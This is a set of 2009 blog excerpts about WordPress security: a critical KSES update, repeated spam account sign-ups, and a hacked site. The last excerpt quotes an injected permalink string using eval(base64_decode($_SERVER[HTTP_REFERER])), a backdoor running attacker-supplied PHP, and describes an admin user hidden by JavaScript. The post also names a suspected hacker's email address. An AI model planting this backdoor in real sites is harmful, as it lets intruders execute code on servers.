Ahh… the dreaded
…a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”
Yeah. What that says to me is, “A hacker has already looked at the vulnerabilities in 3.0.3 and written a script to exploit it and deployed it on the websites he/she has already hacked so that it can go out and get access to even more web servers by simply crawling the web looking for WordPress installations that haven’t been updated yet.”
Read the rest of this entry »
If you're new here, you may want to subscribe to my RSS feed. Thanks for visiting!
UlricheDmond using the email address ulrichedmondsuses@gmail.com just created an acount on this blog.
Since (as the domain name might suggest) this is my blog (Eric Shefferman), there’s no need for anyone else to have an account here.
I googled the name and so far found
http://savelblogs.com/?p=1566
which lists this name/email as someone who tried to hack their blog (along with a list of other hacker usernames).
They seem to be a busy person/hacker/software robot – they also signed up here on September 7 2009
http://bbshowcase.org/forums/profile/ulrichedmond
and here on September 8, 2009:
http://www.nudjit.com/community/profile/ulrichedmond
And probably other places that just haven’t been indexed by google yet.
I deleted the user, but this is getting crazy. Static HTML websites are looking better and better.
- – -
Yup, an hour after I posted this, the same user/email registered on another blog of mine that is totally unrelated. This is pretty stupid since the only reason this is happening is as part of a WordPress security exploit. Someone thinks that by getting a user onto WordPress they can then elevate the user to admin level access and screw around. It’s not like I can stay up all night to try to delete these users as fast as some automated system can add them.
I still have no idea what this means.
I’m currently running WordPress 2.8.4 on this site.
One of my older sites was hacked as per
http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
and the permalinks were changed to
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.
Read the rest of this entry »
